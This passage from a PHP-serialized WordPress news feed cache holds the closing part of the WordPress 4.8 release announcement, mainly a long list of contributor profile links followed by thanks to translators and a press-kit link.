Quick</a>, <a href="https://profiles.wordpress.org/sixhours">Caroline Moore</a>, <a href="https://profiles.wordpress.org/caseypatrickdriscoll">Casey Driscoll</a>, <a href="https://profiles.wordpress.org/caspie">Caspie</a>, <a href="https://profiles.wordpress.org/chandrapatel">Chandra Patel</a>, <a href="https://profiles.wordpress.org/chaos-engine">Chaos Engine</a>, <a href="https://profiles.wordpress.org/cheeserolls">cheeserolls</a>, <a href="https://profiles.wordpress.org/chesio">chesio</a>, <a href="https://profiles.wordpress.org/ketuchetan">chetansatasiya</a>, <a href="https://profiles.wordpress.org/choongsavvii">choong</a>, <a href="https://profiles.wordpress.org/chouby">Chouby</a>, <a href="https://profiles.wordpress.org/chredd">chredd</a>, <a href="https://profiles.wordpress.org/chrisjean">Chris Jean</a>, <a href="https://profiles.wordpress.org/cmmarslender">Chris Marslender</a>, <a href="https://profiles.wordpress.org/chris_d2d">Chris Smith</a>, <a href="https://profiles.wordpress.org/chrisvanpatten">Chris Van Patten</a>, <a href="https://profiles.wordpress.org/chriswiegman">Chris Wiegman</a>, <a href="https://profiles.wordpress.org/chriscct7">chriscct7</a>, <a href="https://profiles.wordpress.org/chriseverson">chriseverson</a>, <a href="https://profiles.wordpress.org/christian1012">Christian Chung</a>, <a href="https://profiles.wordpress.org/cwpnolen">Christian Nolen</a>, <a href="https://profiles.wordpress.org/needle">Christian Wach</a>, <a href="https://profiles.wordpress.org/christophherr">Christoph Herr</a>, <a href="https://profiles.wordpress.org/clarionwpdeveloper">Clarion Technologies</a>, <a href="https://profiles.wordpress.org/claudiosmweb">Claudio Sanches</a>, <a href="https://profiles.wordpress.org/claudiosanches">Claudio Sanches</a>, <a href="https://profiles.wordpress.org/claudiolabarbera">ClaudioLaBarbera</a>, <a href="https://profiles.wordpress.org/codemovementpk">codemovement.pk</a>, <a href="https://profiles.wordpress.org/coderkevin">coderkevin</a>, <a href="https://profiles.wordpress.org/codfish">codfish</a>, <a href="https://profiles.wordpress.org/coreymcollins">coreymcollins</a>, <a href="https://profiles.wordpress.org/curdin">Curdin Krummenacher</a>, <a href="https://profiles.wordpress.org/cgrymala">Curtiss Grymala</a>, <a href="https://profiles.wordpress.org/cdog">Cătălin Dogaru</a>, <a href="https://profiles.wordpress.org/danhgilmore">danhgilmore</a>, <a href="https://profiles.wordpress.org/danielbachhuber">Daniel Bachhuber </a>, <a href="https://profiles.wordpress.org/danielkanchev">Daniel Kanchev</a>, <a href="https://profiles.wordpress.org/danielpietrasik">Daniel Pietrasik</a>, <a href="https://profiles.wordpress.org/mte90">Daniele Scasciafratte</a>, <a href="https://profiles.wordpress.org/dllh">Daryl L. L. Houston (dllh)</a>, <a href="https://profiles.wordpress.org/davepullig">Dave Pullig</a>, <a href="https://profiles.wordpress.org/goto10">Dave Romsey (goto10)</a>, <a href="https://profiles.wordpress.org/davidakennedy">David A. Kennedy</a>, <a href="https://profiles.wordpress.org/turtlepod">David Chandra Purnama</a>, <a href="https://profiles.wordpress.org/dlh">David Herrera</a>, <a href="https://profiles.wordpress.org/dglingren">David Lingren</a>, <a href="https://profiles.wordpress.org/davidmosterd">David Mosterd</a>, <a href="https://profiles.wordpress.org/dshanske">David Shanske</a>, <a href="https://profiles.wordpress.org/davidbhayes">davidbhayes</a>, <a href="https://profiles.wordpress.org/folletto">Davide \'Folletto\' Casali</a>, <a href="https://profiles.wordpress.org/deeptiboddapati">deeptiboddapati</a>, <a href="https://profiles.wordpress.org/delphinus">delphinus</a>, <a href="https://profiles.wordpress.org/deltafactory">deltafactory</a>, <a href="https://profiles.wordpress.org/denis-de-bernardy">Denis de Bernardy</a>, <a href="https://profiles.wordpress.org/valendesigns">Derek Herman</a>, <a href="https://profiles.wordpress.org/pcfreak30">Derrick Hammer</a>, <a href="https://profiles.wordpress.org/derrickkoo">Derrick Koo</a>, <a href="https://profiles.wordpress.org/dimchik">dimchik</a>, <a href="https://profiles.wordpress.org/dineshc">Dinesh Chouhan</a>, <a href="https://profiles.wordpress.org/dd32">Dion Hulse</a>, <a href="https://profiles.wordpress.org/dipeshkakadiya">Dipesh Kakadiya</a>, <a href="https://profiles.wordpress.org/dmsnell">dmsnell</a>, <a href="https://profiles.wordpress.org/ocean90">Dominik Schilling</a>, <a href="https://profiles.wordpress.org/dotancohen">Dotan Cohen</a>, <a href="https://profiles.wordpress.org/dougwollison">Doug Wollison</a>, <a href="https://profiles.wordpress.org/doughamlin">doughamlin</a>, <a href="https://profiles.wordpress.org/dreamon11">DreamOn11</a>, <a href="https://profiles.wordpress.org/drewapicture">Drew Jaynes</a>, <a href="https://profiles.wordpress.org/duncanjbrown">duncanjbrown</a>, <a href="https://profiles.wordpress.org/dungengronovius">dungengronovius</a>, <a href="https://profiles.wordpress.org/dylanauty">DylanAuty</a>, <a href="https://profiles.wordpress.org/hurtige">Eddie Hurtig</a>, <a href="https://profiles.wordpress.org/oso96_2000">Eduardo Reveles</a>, <a href="https://profiles.wordpress.org/chopinbach">Edwin Cromley</a>, <a href="https://profiles.wordpress.org/electricfeet">ElectricFeet</a>, <a href="https://profiles.wordpress.org/eliorivero">Elio Rivero</a>, <a href="https://profiles.wordpress.org/iseulde">Ella Iseulde Van Dorpe</a>, <a href="https://profiles.wordpress.org/elyobo">elyobo</a>, <a href="https://profiles.wordpress.org/enodekciw">enodekciw</a>, <a href="https://profiles.wordpress.org/enshrined">enshrined</a>, <a href="https://profiles.wordpress.org/ericlewis">Eric Andrew Lewis</a>, <a href="https://profiles.wordpress.org/pushred">Eric Lanehart</a>, <a href="https://profiles.wordpress.org/eherman24">Evan Herman</a>, <a href="https://profiles.wordpress.org/flixos90">Felix Arntz</a>, <a href="https://profiles.wordpress.org/fencer04">Fencer04</a>, <a href="https://profiles.wordpress.org/florianbrinkmann">Florian Brinkmann</a>, <a href="https://profiles.wordpress.org/mista-flo">Florian TIAR</a>, <a href="https://profiles.wordpress.org/foliovision">FolioVision</a>, <a href="https://profiles.wordpress.org/fomenkoandrey">fomenkoandrey</a>, <a href="https://profiles.wordpress.org/frankiet">Francesco Taurino</a>, <a href="https://profiles.wordpress.org/frank-klein">Frank Klein</a>, <a href="https://profiles.wordpress.org/fjarrett">Frankie Jarrett</a>, <a href="https://profiles.wordpress.org/akeif">Fred</a>, <a href="https://profiles.wordpress.org/frozzare">Fredrik Forsmo</a>, <a href="https://profiles.wordpress.org/fuscata">fuscata</a>, <a href="https://profiles.wordpress.org/gma992">Gabriel Maldonado</a>, <a href="https://profiles.wordpress.org/voldemortensen">Garth Mortensen</a>, <a href="https://profiles.wordpress.org/garyj">Gary Jones</a>, <a href="https://profiles.wordpress.org/pento">Gary Pendergast</a>, <a href="https://profiles.wordpress.org/geekysoft">Geeky Software</a>, <a href="https://profiles.wordpress.org/georgestephanis">George Stephanis</a>, <a href="https://profiles.wordpress.org/goranseric">Goran &#352;erić</a>, <a href="https://profiles.wordpress.org/grahamarmfield">Graham Armfield</a>, <a href="https://profiles.wordpress.org/grantderepas">Grant Derepas</a>, <a href="https://profiles.wordpress.org/tivnet">Gregory Karpinsky (@tivnet)</a>, <a href="https://profiles.wordpress.org/hardeepasrani">Hardeep Asrani</a>, <a href="https://profiles.wordpress.org/helen">Helen Hou-Sandí</a>, <a href="https://profiles.wordpress.org/henrywright">Henry Wright</a>, <a href="https://profiles.wordpress.org/hiddenpearls">hiddenpearls</a>, <a href="https://profiles.wordpress.org/hnle">Hinaloe</a>, <a href="https://profiles.wordpress.org/hristo-sg">Hristo Pandjarov</a>, <a href="https://profiles.wordpress.org/hugobaeta">Hugo Baeta</a>, <a href="https://profiles.wordpress.org/polevaultweb">Iain Poulson</a>, <a href="https://profiles.wordpress.org/iandunn">Ian Dunn</a>, <a href="https://profiles.wordpress.org/ianedington">Ian Edington</a>, <a href="https://profiles.wordpress.org/idealien">idealien</a>, <a href="https://profiles.wordpress.org/igmoweb">Ignacio Cruz Moreno</a>, <a href="https://profiles.wordpress.org/imath">imath</a>, <a href="https://profiles.wordpress.org/implenton">implenton</a>, <a href="https://profiles.wordpress.org/ionutst">Ionut Stanciu</a>, <a href="https://profiles.wordpress.org/ipstenu">Ipstenu (Mika Epstein)</a>, <a href="https://profiles.wordpress.org/ivdimova">ivdimova</a>, <a href="https://profiles.wordpress.org/jdgrimes">J.D. Grimes</a>, <a href="https://profiles.wordpress.org/jakept">Jacob Peattie</a>, <a href="https://profiles.wordpress.org/whyisjake">Jake Spurlock</a>, <a href="https://profiles.wordpress.org/jnylen0">James Nylen</a>, <a href="https://profiles.wordpress.org/jamesacero">jamesacero</a>, <a href="https://profiles.wordpress.org/japh">Japh</a>, <a href="https://profiles.wordpress.org/jaredcobb">Jared Cobb</a>, <a href="https://profiles.wordpress.org/jayarjo">jayarjo</a>, <a href="https://profiles.wordpress.org/jdolan">jdolan</a>, <a href="https://profiles.wordpress.org/jdoubleu">jdoubleu</a>, <a href="https://profiles.wordpress.org/jblz">Jeff Bowen</a>, <a href="https://profiles.wordpress.org/jbpaul17">Jeff Paul</a>, <a href="https://profiles.wordpress.org/cheffheid">Jeffrey de Wit</a>, <a href="https://profiles.wordpress.org/jeremyfelt">Jeremy Felt</a>, <a href="https://profiles.wordpress.org/jpry">Jeremy Pry</a>, <a href="https://profiles.wordpress.org/jimt">jimt</a>, <a href="https://profiles.wordpress.org/jipmoors">Jip Moors</a>, <a href="https://profiles.wordpress.org/jmusal">jmusal</a>, <a href="https://profiles.wordpress.org/joedolson">Joe Dolson</a>, <a href="https://profiles.wordpress.org/joehoyle">Joe Hoyle</a>, <a href="https://profiles.wordpress.org/joemcgill">Joe McGill</a>, <a href="https://profiles.wordpress.org/joelcj91">Joel James</a>, <a href="https://profiles.wordpress.org/johanmynhardt">johanmynhardt</a>, <a href="https://profiles.wordpress.org/johnbillion">John Blackbourn</a>, <a href="https://profiles.wordpress.org/zyphonic">John Dittmar</a>, <a href="https://profiles.wordpress.org/johnjamesjacoby">John James Jacoby</a>, <a href="https://profiles.wordpress.org/johnpbloch">John P. Bloch</a>, <a href="https://profiles.wordpress.org/johnregan3">John Regan</a>, <a href="https://profiles.wordpress.org/johnpgreen">johnpgreen</a>, <a href="https://profiles.wordpress.org/kenshino">Jon (Kenshino)</a>, <a href="https://profiles.wordpress.org/jonathanbardo">Jonathan Bardo</a>, <a href="https://profiles.wordpress.org/jbrinley">Jonathan Brinley</a>, <a href="https://profiles.wordpress.org/daggerhart">Jonathan Daggerhart</a>, <a href="https://profiles.wordpress.org/desrosj">Jonathan Desrosiers</a>, <a href="https://profiles.wordpress.org/spacedmonkey">Jonny Harris</a>, <a href="https://profiles.wordpress.org/jonnyauk">jonnyauk</a>, <a href="https://profiles.wordpress.org/jordesign">jordesign</a>, <a href="https://profiles.wordpress.org/jorritschippers">JorritSchippers</a>, <a href="https://profiles.wordpress.org/joefusco">Joseph Fusco</a>, <a href="https://profiles.wordpress.org/jjeaton">Josh Eaton</a>, <a href="https://profiles.wordpress.org/shelob9">Josh Pollock</a>, <a href="https://profiles.wordpress.org/joshcummingsdesign">joshcummingsdesign</a>, <a href="https://profiles.wordpress.org/joshkadis">joshkadis</a>, <a href="https://profiles.wordpress.org/joyously">Joy</a>, <a href="https://profiles.wordpress.org/jrf">jrf</a>, <a href="https://profiles.wordpress.org/jrgould">JRGould</a>, <a href="https://profiles.wordpress.org/juanfra">Juanfra Aldasoro</a>, <a href="https://profiles.wordpress.org/juhise">Juhi Saxena</a>, <a href="https://profiles.wordpress.org/nukaga">Junko Nukaga</a>, <a href="https://profiles.wordpress.org/justinbusa">Justin Busa</a>, <a href="https://profiles.wordpress.org/justinsainton">Justin Sainton</a>, <a href="https://profiles.wordpress.org/jshreve">Justin Shreve</a>, <a href="https://profiles.wordpress.org/jtsternberg">Justin Sternberg</a>, <a href="https://profiles.wordpress.org/kadamwhite">K.Adam White</a>, <a href="https://profiles.wordpress.org/kacperszurek">kacperszurek</a>, <a href="https://profiles.wordpress.org/trepmal">Kailey (trepmal)</a>, <a href="https://profiles.wordpress.org/kalenjohnson">KalenJohnson</a>, <a href="https://profiles.wordpress.org/codebykat">Kat Hagan</a>, <a href="https://profiles.wordpress.org/kkoppenhaver">Keanan Koppenhaver</a>, <a href="https://profiles.wordpress.org/keesiemeijer">keesiemeijer</a>, <a href="https://profiles.wordpress.org/kellbot">kellbot</a>, <a href="https://profiles.wordpress.org/ryelle">Kelly Dwan</a>, <a href="https://profiles.wordpress.org/khag7">Kevin Hagerty</a>, <a href="https://profiles.wordpress.org/kwight">Kirk Wight</a>, <a href="https://profiles.wordpress.org/kitchin">kitchin</a>, <a href="https://profiles.wordpress.org/ixkaito">Kite</a>, <a href="https://profiles.wordpress.org/kjbenk">kjbenk</a>, <a href="https://profiles.wordpress.org/knutsp">Knut Sparhell</a>, <a href="https://profiles.wordpress.org/koenschipper">koenschipper</a>, <a href="https://profiles.wordpress.org/kokarn">kokarn</a>, <a href="https://profiles.wordpress.org/kovshenin">Konstantin Kovshenin</a>, <a href="https://profiles.wordpress.org/obenland">Konstantin Obenland</a>, <a href="https://profiles.wordpress.org/kouratoras">Konstantinos Kouratoras</a>, <a href="https://profiles.wordpress.org/kuchenundkakao">kuchenundkakao</a>, <a href="https://profiles.wordpress.org/kuldipem">kuldipem</a>, <a href="https://profiles.wordpress.org/laurelfulford">Laurel Fulford</a>, <a href="https://profiles.wordpress.org/leewillis77">Lee Willis</a>, <a href="https://profiles.wordpress.org/leobaiano">Leo Baiano</a>, <a href="https://profiles.wordpress.org/littlebigthing">LittleBigThings (Csaba)</a>, <a href="https://profiles.wordpress.org/lucasstark">Lucas Stark</a>, <a href="https://profiles.wordpress.org/lukecavanagh">Luke Cavanagh</a>, <a href="https://profiles.wordpress.org/lgedeon">Luke Gedeon</a>, <a href="https://profiles.wordpress.org/lukepettway">Luke Pettway</a>, <a href="https://profiles.wordpress.org/lyubomir_popov">lyubomir_popov</a>, <a href="https://profiles.wordpress.org/mageshp">mageshp</a>, <a href="https://profiles.wordpress.org/mahesh901122">Mahesh Waghmare</a>, <a href="https://profiles.wordpress.org/mangeshp">Mangesh Parte</a>, <a href="https://profiles.wordpress.org/manishsongirkar36">Manish Songirkar</a>, <a href="https://profiles.wordpress.org/mantismamita">mantismamita</a>, <a href="https://profiles.wordpress.org/mbootsman">Marcel Bootsman</a>, <a href="https://profiles.wordpress.org/tyxla">Marin Atanasov</a>, <a href="https://profiles.wordpress.org/mariovalney">Mario Valney</a>, <a href="https://profiles.wordpress.org/clorith">Marius L. J.</a>, <a href="https://profiles.wordpress.org/mbelchev">Mariyan Belchev</a>, <a href="https://profiles.wordpress.org/markjaquith">Mark Jaquith</a>, <a href="https://profiles.wordpress.org/mrwweb">Mark Root-Wiley</a>, <a href="https://profiles.wordpress.org/mapk">Mark Uraine</a>, <a href="https://profiles.wordpress.org/markoheijnen">Marko Heijnen</a>, <a href="https://profiles.wordpress.org/markshep">markshep</a>, <a href="https://profiles.wordpress.org/matrixik">matrixik</a>, <a href="https://profiles.wordpress.org/mjbanks">Matt Banks</a>, <a href="https://profiles.wordpress.org/mattking5000">Matt King</a>, <a href="https://profiles.wordpress.org/jaworskimatt">Matt PeepSo</a>, <a href="https://profiles.wordpress.org/veraxus">Matt van Andel</a>, <a href="https://profiles.wordpress.org/mattwiebe">Matt Wiebe</a>, <a href="https://profiles.wordpress.org/mattheu">Matthew Haines-Young</a>, <a href="https://profiles.wordpress.org/mattyrob">mattyrob</a>, <a href="https://profiles.wordpress.org/maxcutler">Max Cutler</a>, <a href="https://profiles.wordpress.org/maximeculea">Maxime Culea</a>, <a href="https://profiles.wordpress.org/mayukojpn">Mayo Moriyama</a>, <a href="https://profiles.wordpress.org/mckernanin">mckernanin</a>, <a href="https://profiles.wordpress.org/melchoyce">Mel Choyce</a>, <a href="https://profiles.wordpress.org/mhowell">mhowell</a>, <a href="https://profiles.wordpress.org/michaelarestad">Michael Arestad</a>, <a href="https://profiles.wordpress.org/michael-arestad">Michael Arestad</a>, <a href="https://profiles.wordpress.org/michalzuber">michalzuber</a>, <a href="https://profiles.wordpress.org/stubgo">Miina Sikk</a>, <a href="https://profiles.wordpress.org/mauteri">Mike Auteri</a>, <a href="https://profiles.wordpress.org/mihai2u">Mike Crantea</a>, <a href="https://profiles.wordpress.org/mdgl">Mike Glendinning</a>, <a href="https://profiles.wordpress.org/mikehansenme">Mike Hansen</a>, <a href="https://profiles.wordpress.org/mikelittle">Mike Little</a>, <a href="https://profiles.wordpress.org/mikeschroder">Mike Schroder</a>, <a href="https://profiles.wordpress.org/mikeviele">Mike Viele</a>, <a href="https://profiles.wordpress.org/dimadin">Milan Dinić</a>, <a href="https://profiles.wordpress.org/modemlooper">modemlooper</a>, <a href="https://profiles.wordpress.org/batmoo">Mohammad Jangda</a>, <a href="https://profiles.wordpress.org/deremohan">Mohan Dere</a>, <a href="https://profiles.wordpress.org/monikarao">monikarao</a>, <a href="https://profiles.wordpress.org/morettigeorgiev">morettigeorgiev</a>, <a href="https://profiles.wordpress.org/morganestes">Morgan Estes</a>, <a href="https://profiles.wordpress.org/mor10">Morten Rand-Hendriksen</a>, <a href="https://profiles.wordpress.org/mt8biz">moto hachi ( mt8.biz )</a>, <a href="https://profiles.wordpress.org/mrbobbybryant">mrbobbybryant</a>, <a href="https://profiles.wordpress.org/nnaimov">Naim Naimov</a>, <a href="https://profiles.wordpress.org/natereist">Nate Reist</a>, <a href="https://profiles.wordpress.org/natewr">NateWr</a>, <a href="https://profiles.wordpress.org/nathanrice">nathanrice</a>, <a href="https://profiles.wordpress.org/nazgul">Nazgul</a>, <a href="https://profiles.wordpress.org/greatislander">Ned Zimmerman</a>, <a href="https://profiles.wordpress.org/krstarica">net</a>, <a href="https://profiles.wordpress.org/celloexpressions">Nick Halsey </a>, <a href="https://profiles.wordpress.org/nikeo">Nicolas GUILLAUME</a>, <a href="https://profiles.wordpress.org/nikschavan">Nikhil Chavan</a>, <a href="https://profiles.wordpress.org/nikv">Nikhil Vimal</a>, <a href="https://profiles.wordpress.org/nbachiyski">Nikolay Bachiyski</a>, <a href="https://profiles.wordpress.org/rabmalin">Nilambar Sharma</a>, <a href="https://profiles.wordpress.org/noplanman">noplanman</a>, <a href="https://profiles.wordpress.org/nullvariable">nullvariable</a>, <a href="https://profiles.wordpress.org/odie2">odie2</a>, <a href="https://profiles.wordpress.org/odysseygate">odyssey</a>, <a href="https://profiles.wordpress.org/hideokamoto">Okamoto Hidetaka</a>, <a href="https://profiles.wordpress.org/orvils">orvils</a>, <a href="https://profiles.wordpress.org/oskosk">oskosk</a>, <a href="https://profiles.wordpress.org/ottok">Otto Kek&#228;l&#228;inen</a>, <a href="https://profiles.wordpress.org/ovann86">ovann86</a>, <a href="https://profiles.wordpress.org/imnok">Pantip Treerattanapitak (Nok)</a>, <a href="https://profiles.wordpress.org/swissspidy">Pascal Birchler</a>, <a href="https://profiles.wordpress.org/patilvikasj">patilvikasj</a>, <a href="https://profiles.wordpress.org/pbearne">Paul Bearne</a>, <a href="https://profiles.wordpress.org/paulwilde">Paul Wilde</a>, <a href="https://profiles.wordpress.org/sirbrillig">Payton Swick</a>, <a href="https://profiles.wordpress.org/pdufour">pdufour</a>, <a href="https://profiles.wordpress.org/piewp">Perdaan</a>, <a href="https://profiles.wordpress.org/peterwilsoncc">Peter Wilson</a>, <a href="https://profiles.wordpress.org/phh">phh</a>, <a href="https://profiles.wordpress.org/php">php</a>, <a href="https://profiles.wordpress.org/delawski">Piotr Delawski</a>, <a href="https://profiles.wordpress.org/pippinsplugins">pippinsplugins</a>, <a href="https://profiles.wordpress.org/pjgalbraith">pjgalbraith</a>, <a href="https://profiles.wordpress.org/pkevan">pkevan</a>, <a href="https://profiles.wordpress.org/pratikchaskar">Pratik</a>, <a href="https://profiles.wordpress.org/pressionate">Pressionate</a>, <a href="https://profiles.wordpress.org/presskopp">Presskopp</a>, <a href="https://profiles.wordpress.org/procodewp">procodewp</a>, <a href="https://profiles.wordpress.org/rachelbaker">Rachel Baker</a>, <a href="https://profiles.wordpress.org/rahulsprajapati">Rahul Prajapati</a>, <a href="https://profiles.wordpress.org/superpoincare">Ramanan</a>, <a href="https://profiles.wordpress.org/ramiy">Rami Yushuvaev</a>, <a href="https://profiles.wordpress.org/ramiabraham">ramiabraham</a>, <a href="https://profiles.wordpress.org/ranh">ranh</a>, <a href="https://profiles.wordpress.org/redsand">Red Sand Media Group</a>, <a href="https://profiles.wordpress.org/youknowriad">Riad Benguella</a>, <a href="https://profiles.wordpress.org/rianrietveld">Rian Rietveld</a>, <a href="https://profiles.wordpress.org/iamfriendly">Richard Tape</a>, <a href="https://profiles.wordpress.org/rpayne7264">Robert D Payne</a>, <a href="https://profiles.wordpress.org/iamjolly">Robert Jolly</a>, <a href="https://profiles.wordpress.org/rnoakes3rd">Robert Noakes</a>, <a href="https://profiles.wordpress.org/d4z_c0nf">Rocco Aliberti</a>, <a href="https://profiles.wordpress.org/rodrigosprimo">Rodrigo Primo</a>, <a href="https://profiles.wordpress.org/rommelxcastro">Rommel Castro</a>, <a href="https://profiles.wordpress.org/fronaldaraujo">Ronald Ara&#250;jo</a>, <a href="https://profiles.wordpress.org/magicroundabout">Ross Wintle</a>, <a href="https://profiles.wordpress.org/guavaworks">Roy Sivan</a>, <a href="https://profiles.wordpress.org/ryankienstra">Ryan Kienstra</a>, <a href="https://profiles.wordpress.org/rmccue">Ryan McCue</a>, <a href="https://profiles.wordpress.org/ryanplas">Ryan Plas</a>, <a href="https://profiles.wordpress.org/welcher">Ryan Welcher</a>, <a href="https://profiles.wordpress.org/salcode">Sal Ferrarello</a>, <a href="https://profiles.wordpress.org/samikeijonen">Sami Keijonen</a>, <a href="https://profiles.wordpress.org/solarissmoke">Samir Shah</a>, <a href="https://profiles.wordpress.org/samuelsidler">Samuel Sidler</a>, <a href="https://profiles.wordpress.org/sandesh055">Sandesh</a>, <a href="https://profiles.wordpress.org/smyoon315">Sang-Min Yoon</a>, <a href="https://profiles.wordpress.org/sanketparmar">Sanket Parmar</a>, <a href="https://profiles.wordpress.org/pollyplummer">Sarah Gooding</a>, <a href="https://profiles.wordpress.org/sayedwp">Sayed Taqui</a>, <a href="https://profiles.wordpress.org/schrapel">schrapel</a>, <a href="https://profiles.wordpress.org/coffee2code">Scott Reilly</a>, <a href="https://profiles.wordpress.org/wonderboymusic">Scott Taylor</a>, <a href="https://profiles.wordpress.org/scrappyhuborg">scrappy@hub.org</a>, <a href="https://profiles.wordpress.org/scribu">scribu</a>, <a href="https://profiles.wordpress.org/seancjones">seancjones</a>, <a href="https://profiles.wordpress.org/sebastianpisula">Sebastian Pisula</a>, <a href="https://profiles.wordpress.org/sergeybiryukov">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/sgr33n">Sergio De Falco</a>, <a href="https://profiles.wordpress.org/sfpt">sfpt</a>, <a href="https://profiles.wordpress.org/shayanys">shayanys</a>, <a href="https://profiles.wordpress.org/shazahm1hotmailcom">shazahm1</a>, <a href="https://profiles.wordpress.org/shprink">shprink</a>, <a href="https://profiles.wordpress.org/simonlampen">simonlampen</a>, <a href="https://profiles.wordpress.org/skippy">skippy</a>, <a href="https://profiles.wordpress.org/smerriman">smerriman</a>, <a href="https://profiles.wordpress.org/snacking">snacking</a>, <a href="https://profiles.wordpress.org/solal">solal</a>, <a href="https://profiles.wordpress.org/soean">Soren Wrede</a>, <a href="https://profiles.wordpress.org/sstoqnov">Stanimir Stoyanov</a>, <a href="https://profiles.wordpress.org/metodiew">Stanko Metodiev</a>, <a href="https://profiles.wordpress.org/sharkomatic">Steph</a>, <a href="https://profiles.wordpress.org/sswells">Steph Wells</a>, <a href="https://profiles.wordpress.org/sillybean">Stephanie Leary</a>, <a href="https://profiles.wordpress.org/netweb">Stephen Edgar</a>, <a href="https://profiles.wordpress.org/stephenharris">Stephen Harris</a>, <a href="https://profiles.wordpress.org/stevenkword">Steven Word</a>, <a href="https://profiles.wordpress.org/stevenlinx">stevenlinx</a>, <a href="https://profiles.wordpress.org/sudar">Sudar Muthu</a>, <a href="https://profiles.wordpress.org/patilswapnilv">Swapnil V. Patil</a>, <a href="https://profiles.wordpress.org/swapnild">swapnild</a>, <a href="https://profiles.wordpress.org/szaqal21">szaqal21</a>, <a href="https://profiles.wordpress.org/takahashi_fumiki">Takahashi Fumiki</a>, <a href="https://profiles.wordpress.org/miyauchi">Takayuki Miyauchi</a>, <a href="https://profiles.wordpress.org/karmatosed">Tammie Lister</a>, <a href="https://profiles.wordpress.org/tapsboy">tapsboy</a>, <a href="https://profiles.wordpress.org/tlovett1">Taylor Lovett</a>, <a href="https://profiles.wordpress.org/team">team</a>, <a href="https://profiles.wordpress.org/tg29359">tg29359</a>, <a href="https://profiles.wordpress.org/tharsheblows">tharsheblows</a>, <a href="https://profiles.wordpress.org/the">the</a>, <a href="https://profiles.wordpress.org/themeshaper">themeshaper</a>, <a href="https://profiles.wordpress.org/thenbrent">thenbrent</a>, <a href="https://profiles.wordpress.org/thomaswm">thomaswm</a>, <a href="https://profiles.wordpress.org/tfrommen">Thorsten Frommen</a>, <a href="https://profiles.wordpress.org/tierra">tierra</a>, <a href="https://profiles.wordpress.org/tnash">Tim Nash</a>, <a href="https://profiles.wordpress.org/timmydcrawford">Timmy Crawford</a>, <a href="https://profiles.wordpress.org/timothyblynjacobs">Timothy Jacobs</a>, <a href="https://profiles.wordpress.org/timph">timph</a>, <a href="https://profiles.wordpress.org/tkama">Tkama</a>, <a href="https://profiles.wordpress.org/tnegri">tnegri</a>, <a href="https://profiles.wordpress.org/tomauger">Tom Auger</a>, <a href="https://profiles.wordpress.org/tjnowell">Tom J Nowell</a>, <a href="https://profiles.wordpress.org/tomdxw">tomdxw</a>, <a href="https://profiles.wordpress.org/toro_unit">Toro_Unit (Hiroshi Urabe)</a>, <a href="https://profiles.wordpress.org/zodiac1978">Torsten Landsiedel</a>, <a href="https://profiles.wordpress.org/transl8or">transl8or</a>, <a href="https://profiles.wordpress.org/traversal">traversal</a>, <a href="https://profiles.wordpress.org/wpsmith">Travis Smith</a>, <a href="https://profiles.wordpress.org/nmt90">Triet Minh</a>, <a href="https://profiles.wordpress.org/trishasalas">Trisha Salas</a>, <a href="https://profiles.wordpress.org/tristangemus">tristangemus</a>, <a href="https://profiles.wordpress.org/truongwp">truongwp</a>, <a href="https://profiles.wordpress.org/tsl143">tsl143</a>, <a href="https://profiles.wordpress.org/tywayne">Ty Carlson</a>, <a href="https://profiles.wordpress.org/grapplerulrich">Ulrich</a>, <a href="https://profiles.wordpress.org/utkarshpatel">Utkarsh</a>, <a href="https://profiles.wordpress.org/valeriutihai">Valeriu Tihai</a>, <a href="https://profiles.wordpress.org/zuige">Viljami Kuosmanen</a>, <a href="https://profiles.wordpress.org/vishalkakadiya">Vishal Kakadiya</a>, <a href="https://profiles.wordpress.org/vortfu">vortfu</a>, <a href="https://profiles.wordpress.org/vrundakansara-1">Vrunda Kansara</a>, <a href="https://profiles.wordpress.org/webbgaraget">webbgaraget</a>, <a href="https://profiles.wordpress.org/webmandesign">WebMan Design &#124; Oliver Juhas</a>, <a href="https://profiles.wordpress.org/websupporter">websupporter</a>, <a href="https://profiles.wordpress.org/westonruter">Weston Ruter</a>, <a href="https://profiles.wordpress.org/earnjam">William Earnhardt</a>, <a href="https://profiles.wordpress.org/williampatton">williampatton</a>, <a href="https://profiles.wordpress.org/wolly">Wolly aka Paolo Valenti</a>, <a href="https://profiles.wordpress.org/wraithkenny">WraithKenny</a>, <a href="https://profiles.wordpress.org/yale01">yale01</a>, <a href="https://profiles.wordpress.org/yoavf">Yoav Farhi</a>, <a href="https://profiles.wordpress.org/yogasukma">Yoga Sukma</a>, <a href="https://profiles.wordpress.org/oxymoron">Zach Wills</a>, <a href="https://profiles.wordpress.org/tollmanz">Zack Tollman</a>, <a href="https://profiles.wordpress.org/vanillalounge">Ze Fontainhas</a>, <a href="https://profiles.wordpress.org/zhildzik">zhildzik</a>, and <a href="https://profiles.wordpress.org/zsusag">zsusag</a>.\n<p>&nbsp;</p>\n<p>Finally, thanks to all the community translators who worked on WordPress 4.8. Their efforts bring WordPress 4.8 fully translated to 38 languages at release time with more on the way.</p>\n<p>Do you want to report on WordPress 4.8? <a href="https://s.w.org/images/core/4.8/wp-4-8_press-kit.zip">We&#8217;ve compiled a press kit</a> featuring information about the release features, and some media assets to help you along.</p>\n<p>If you want to follow along or help out, check out <a href="https://make.wordpress.org/">Make WordPress</a> and our <a href="https://make.wordpress.org/core/">core development blog</a>. Thanks for choosing WordPress — we hope you enjoy!</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4770";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:33:"WordPress 4.8 Release Candidate 